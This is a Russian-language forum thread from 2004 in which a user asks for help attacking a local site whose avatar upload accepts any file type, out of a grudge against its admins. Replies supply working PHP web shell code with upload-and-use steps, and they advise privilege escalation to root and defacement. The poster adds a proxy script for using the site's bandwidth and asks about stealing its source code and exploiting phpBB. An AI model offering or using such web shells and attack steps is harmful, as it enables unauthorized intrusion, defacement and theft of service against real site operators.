Помогите сломать с помощью php
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Помогите сломать с помощью php - 2004-07-16 15:04:51
|
|
|
coolerphp
Сообщений: 42
Оценки: 0
Присоединился: 2004-07-16 14:25:15
|
Привет всем!!! Я пришел на этот форум с небольшой просьбой. Вобщем в нашей сети есть местный сайт, на котором есть форум. В этом форуме я нашел небольшую уязвимость: при регистрации можно закачать им на сервер аватар, и при этом у них нет проверки на расширение файла, тоесть я могу туда отправить любой php-шный файл. Т.к. с админами у меня нелады, можно ли им немного навредить с помощью php?!?! подскажите какой нибудь пакостный скрипт на php? Заранее всем большое спасибо![sm=zhabba.gif]
|
|
|
|
|
Помогите сломать с помощью php - 2004-07-16 16:30:13
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Простенько и со вкусом, хотя можно пойти дальше:
<? $a=system($command); echo "$a"; ?> Этот код, как ты понимаешь, выполнит на сервере команду из переменной $command.
|
|
|
|
|
Помогите сломать с помощью php - 2004-07-17 13:07:19
|
|
|
coolerphp
Сообщений: 42
Оценки: 0
Присоединился: 2004-07-16 14:25:15
|
Спасибо!!! Но я неособо силен в php, можешь сказать что произайдёт на сервере(сайта) при открытии страницы со скриптом!? Кстати у них apache под Unix.
|
|
|
|
|
Помогите сломать с помощью php - 2004-07-17 17:27:10
|
|
|
coolerphp
Сообщений: 42
Оценки: 0
Присоединился: 2004-07-16 14:25:15
|
Спасибо!!! Но я неособо силен в php, можешь сказать что произайдёт на сервере(сайта) при открытии страницы со скриптом!? Кстати у них apache под Unix.
|
|
|
|
|
Помогите сломать с помощью php - 2004-07-18 01:46:31
|
|
|
Nightfly
Сообщений: 1381
Оценки: 0
Присоединился: 2004-03-12 11:46:07
|
Для особо продвинутых не способных пользоватьсмя <?php system($_GET['cmd']); ?> есть remview - http://nfly.by.ru/m-d.php или гуглем хде найдешь.[sm=em88.gif]
Возможность выполнить свой код с правами апача на уделенном хосте это уже 99% дефейса и 35% порута, в чем собссно трабл?
|
|
|
|
|
Помогите сломать с помощью php - 2004-07-18 12:38:18
|
|
|
coolerphp
Сообщений: 42
Оценки: 0
Присоединился: 2004-07-16 14:25:15
|
Nightfly ссылка которую ты дал, мёртвая. Ты имеешь ввиду чтобы я почитал немного php?!?! почитать я почитаю, но а конкретно на что обратить внимание чтобы произвести дефейс? или может у тебя есть какой нибудь готовый скрипт для этого? напиши плиз ещё раз ссылку. Зарание спасибо!!
|
|
|
|
|
Помогите сломать с помощью php - 2004-07-18 16:35:26
|
|
|
Zend
Сообщений: 17
Оценки: 0
Присоединился: 2004-06-08 18:20:34
|
Все очень просто! Хотя лучше сам почитай про php и разберись.
1. Создай файл xakep_shell.php:
<?
echo system($_GET['cmd']);
?>
2. Закачай его через свою уязвимость.
3. Используй: www.hren.ru/forum/xakep_shell.php?cmd=А ВОТ ТУТ пиши любые никсовские консольные команды!
Пример:
www.target.ru/forum/avatars/xakep_shell.php?cmd=ls
Выдаст тебе листинг текущей директории.
ЗЫ. Дальше видимо сам разберешься [sm=11.gif]
|
|
|
|
|
Помогите сломать с помощью php - 2004-07-19 05:08:19
|
|
|
coolerphp
Сообщений: 42
Оценки: 0
Присоединился: 2004-07-16 14:25:15
|
Ок! Разберусь! Только вот могли бы вы дать мне ссылочку, где можно найти инфу по этим самым никсовским консольным командам.[sm=sm128.gif]
|
|
|
|
|
Помогите сломать с помощью php - 2004-07-19 07:52:32
|
|
|
Zend
Сообщений: 17
Оценки: 0
Присоединился: 2004-06-08 18:20:34
|
Поищи на:
www.linuxbegin.ru
www.linux.org.ru
и тому подобных порталах.
|
|
|
|
|
Помогите сломать с помощью php - 2004-07-19 09:48:26
|
|
|
coolerphp
Сообщений: 42
Оценки: 0
Присоединился: 2004-07-16 14:25:15
|
А вообще реально получить права админа с помощью этих самых никсовских команд? Или сделать дефейс?
|
|
|
|
|
Помогите сломать с помощью php - 2004-07-19 14:15:12
|
|
|
Dima-k17
Сообщений: 28
Оценки: 0
Присоединился: 2004-07-14 03:16:09
|
реально:)))
комманда "su" даст тебе рута…. при правильном использовании:))))
|
|
|
|
|
Помогите сломать с помощью php - 2004-07-19 15:03:14
|
|
|
coolerphp
Сообщений: 42
Оценки: 0
Присоединился: 2004-07-16 14:25:15
|
Если есть может дадите ссылочку на подробное описание этой команды "su"? И желательно на все никсовские команды.[sm=sm128.gif]
|
|
|
|
|
Помогите сломать с помощью php - 2004-07-19 15:43:08
|
|
|
Zend
Сообщений: 17
Оценки: 0
Присоединился: 2004-06-08 18:20:34
|
Слушай, ну я же дал тебе линки, поищи там. А получишь рута ты так. Сначала заимеешь шелл через веб-интерфейс (xakep_shell.php), он уже почти у тя в кармане. Потом с помощью локального эксплоита повышаешь свои права до рутовских. А дефейс можно и с апачевскими правами сотворить.
|
|
|
|
|
Помогите сломать с помощью php - 2004-07-20 23:48:41
|
|
|
Dima-k17
Сообщений: 28
Оценки: 0
Присоединился: 2004-07-14 03:16:09
|
А если у Апача права nobody а на директорию www права -rw-rw-r- ???? Что тогда?
Остается только папка /tmp
|
|
|
|
|
Помогите сломать с помощью php - 2004-07-22 12:57:48
|
|
|
coolerphp
Сообщений: 42
Оценки: 0
Присоединился: 2004-07-16 14:25:15
|
Ещё 2 вопросика: как получить права на Апач, с помощью каких комманд? И могу ли я как нибудь спереть исходники ихнего форума, страниц и тд?[sm=sm128.gif]
|
|
|
|
|
Помогите сломать с помощью php - 2004-08-01 15:56:47
|
|
|
coolerphp
Сообщений: 42
Оценки: 0
Присоединился: 2004-07-16 14:25:15
|
Я вот тут подумал, если я на свой местный сайт могу слить какой нибудь скрипт, а за инет я оплачиваю трафик, и доступ к месному сайту не тарифицируется, то почему бы не юзать инет за счет этого сайта?!?! Например:
<form action=inet.php>
<input type=text size=90 value="<? echo($url); ?>" name=url>
<input type=submit value="GO!!!">
</form>
<hr width=100%>
<br><br>
<?
$url="http://".$url;
$filepointer=@fopen($url,r);
$infa=fread($filepointer,10000000);
echo($infa);
?>
а вот как качать мп3?!?![sm=sm128.gif]
|
|
|
|
|
Помогите сломать с помощью php - 2004-08-15 11:16:57
|
|
|
coolerphp
Сообщений: 42
Оценки: 0
Присоединился: 2004-07-16 14:25:15
|
Может кто подскажет, а точнее расскажет, какие есть уязвимости в форумах и как ими воспользоваться, напримере phpBB?!
|
|
|
|
|
|
